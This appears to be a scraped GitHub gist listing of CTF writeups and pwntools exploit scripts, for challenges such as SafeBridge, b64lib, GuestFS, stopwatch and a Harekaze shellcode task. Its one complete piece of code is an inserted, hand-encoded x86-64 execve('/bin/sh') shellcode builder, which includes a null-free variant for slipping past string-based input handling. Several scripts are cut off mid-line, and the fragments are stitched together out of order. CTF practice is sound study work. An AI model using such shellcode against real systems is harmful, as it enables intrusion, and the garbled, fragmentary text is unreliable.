Faith farazsth98

🔍 Looking for zero days
@farazsth98
farazsth98 / 1-writeup.md
Last active January 30, 2024 21:17
SafeBridge Writeup: See 1-writeup.md for a short description of the bug and attack path.

TL;DR

All challenge files + exploit can be found here: https://github.com/farazsth98/CTF/tree/master/realworldctf-2024/safebridge

The setup of the challenge is as follows:

  1. Two bridge contracts deployed on L1 and L2.
  2. WETH is deployed on L2 at hardcoded address L2_WETH.
  3. The deployer has already transferred 2 WETH from L1 to L2, so the L1 bridge has 2 WETH in it.
  4. The objective is to drain the L1 bridge.
@farazsth98
farazsth98 / b64lib.md
Last active April 25, 2021 04:20
S4CTF 2021 - b64lib

The challenge - 2 solves

You can find the challenge files here.

Hackers always love base64.

nc 185.14.184.242 9990

This challenge provided a binary that took some input from the user and either base64-encoded or base64-decoded it.

@farazsth98
farazsth98 / GuestFS.md
Last active December 11, 2023 19:24
zer0pts CTF 2021 - GuestFS

Vulnerabilities

This was a two-part challenge, and I have to cover the vulnerability for the web version as well because it's used in the final exploit for RCE.

Files can be found here.

Bug 1: Bypass validate_path() checks

The create() function is as follows:

@farazsth98
farazsth98 / not_beginners_stack.py
Created March 7, 2021 12:04
zer0pts CTF 2021 - Not Beginners Stack
#!/usr/bin/env python3
from pwn import *
#p = process("./chall")
p = remote("pwn.ctf.zer0pts.com", 9011)
#gdb.attach(p)
# Overwrite rbp with return address array + some offset
@farazsth98
farazsth98 / stopwatch.py
Last active March 7, 2021 12:03
zer0pts CTF 2021 - stopwatch
#!/usr/bin/env python3
from pwn import *
elf = ELF("./chall")
libc = ELF("./libc.so.6")
#p = process("./chall", env = {"LD_PRELOAD": "./libc.so.6"})
p = remote("pwn.ctf.zer0pts.com", 9002)
format_str = 0x602100
@farazsth98
farazsth98 / custom.md
Last active February 28, 2021 10:29
AeroCTF 2021 - Custom

Just another object creation primitive. Please, obtain the flag.

custom.tar.gz

nc 151.236.114.211 17102

Hint: FROM mcr.microsoft.com/dotnet/runtime:5.0

Author: keltecc (Discord)

@farazsth98
farazsth98 / notepad.md
Last active February 22, 2021 09:44
Union CTF 2021 - notepad

Here's a cool notepad! We heard that Bjarne Stroustrup himself uses it to manage his notes. Does that make it... notepad++?

nc 35.205.119.236 1337

Author: mrtumble & nankeen

Solves: 10

Functionality

@farazsth98
farazsth98 / harekaze_mini_ctf_2020.md
Last active February 27, 2021 05:24
Harekaze mini CTF 2020

I played Harekaze Mini CTF 2020 for about 3 hours this weekend. The pwn challenges were nice (I especially enjoyed nm-game-extreme). Here are some short writeups.

shellcode

The program just tells you to provide shellcode that will execute execve("/bin/sh", NULL, NULL). It gives you the address of the "/bin/sh" string, so you just create shellcode to do the job and send it:

#!/usr/bin/env python3

from pwn import *
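The shellcode the challenge asks for, as an added example that is not the gist's own solve script (the gist's script is a pwntools one). It hand-encodes the x86-64 instruction bytes for execve(binsh_addr, NULL, NULL) so it can be built and inspected without pwntools; the address 0x7ffd1234abcd used below is a made-up stand-in for whatever the program prints. It goes one step beyond the challenge: because a 64-bit address always has zero high bytes, a `null_free` variant loads the address shifted into the immediate and shifts it back, which matters when the target reads the shellcode with a string function that stops at a NUL.

```python
#!/usr/bin/env python3
"""Hand-encoded x86-64 execve("/bin/sh", NULL, NULL) shellcode for a known
address of the "/bin/sh" string.  Added example, not the challenge author's
code.  Encodings can be checked with:
    objdump -D -b binary -m i386:x86-64 shellcode.bin
"""
import struct

SYS_EXECVE = 0x3B

# Tail that is the same for every variant and contains no NUL bytes.
_TAIL = (
    b"\x31\xf6"      # xor esi, esi   ; argv = NULL
    + b"\x31\xd2"    # xor edx, edx   ; envp = NULL
    + b"\x6a\x3b"    # push 0x3b      ; SYS_execve, 2 bytes instead of mov eax, imm32
    + b"\x58"        # pop rax
    + b"\x0f\x05"    # syscall
)


def _load_rdi(addr: int, null_free: bool) -> bytes:
    """Instruction bytes that put addr into rdi (first execve argument)."""
    if not 0 <= addr < 2**64:
        raise ValueError("address out of range")
    if null_free:
        # Only user-space canonical addresses (< 2**48) fit the shifted trick:
        # movabs rdi, (addr << 16) | 0xffff ; shr rdi, 16
        # The two low bytes of the immediate are 0xff, the two high bytes hold
        # the top of addr, so no zero byte appears if addr's own bytes are non-zero.
        if addr >= 2**48:
            raise ValueError("null-free load needs a < 48-bit address")
        imm = (addr << 16) | 0xFFFF
        return b"\x48\xbf" + struct.pack("<Q", imm) + b"\x48\xc1\xef\x10"
    if addr < 2**32:
        # mov edi, imm32 zero-extends into rdi and saves three bytes.
        return b"\xbf" + struct.pack("<I", addr)
    # movabs rdi, imm64
    return b"\x48\xbf" + struct.pack("<Q", addr)


def build_execve_shellcode(binsh_addr: int, null_free: bool = False) -> bytes:
    """Return shellcode executing execve(binsh_addr, NULL, NULL).

    binsh_addr is the address of a "/bin/sh" string the target already holds
    (the challenge leaks it).  With null_free=True the result is guaranteed to
    contain no 0x00 byte, or a ValueError is raised if that is impossible.
    """
    sc = _load_rdi(binsh_addr, null_free) + _TAIL
    if null_free and has_null_bytes(sc):
        raise ValueError("address bytes themselves contain a NUL; pick another load")
    return sc


def has_null_bytes(sc: bytes) -> bool:
    """True if the payload would be truncated by strcpy/scanf-style input."""
    return b"\x00" in sc


if __name__ == "__main__":
    # Constructed sample address standing in for the one the program prints.
    addr = 0x7FFD1234ABCD
    for nf in (False, True):
        sc = build_execve_shellcode(addr, null_free=nf)
        print(f"null_free={nf!s:5} len={len(sc):2} nulls={has_null_bytes(sc)} {sc.hex()}")
```

The plain variant is what the challenge needs when the shellcode is read with read(2); the null-free one is the version to reach for when the input path is a string function, and the check in `build_execve_shellcode` tells you up front if the leaked address itself defeats it.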
#!/usr/bin/env python3
from pwn import *
context.arch = "amd64"
'''
Bug 1 - printf(hanger[msg]) in the display() function is a format
string bug. My exploit doesn't use it though.

I spent around 3 hrs solving this. I wish I had more time to spend on this CTF because the challenges looked really good!

Challenge

Basically just a Java heap pwn challenge. You can create and edit chunks, but it's done through a JNI function written in C, which means memory corruption is a possibility.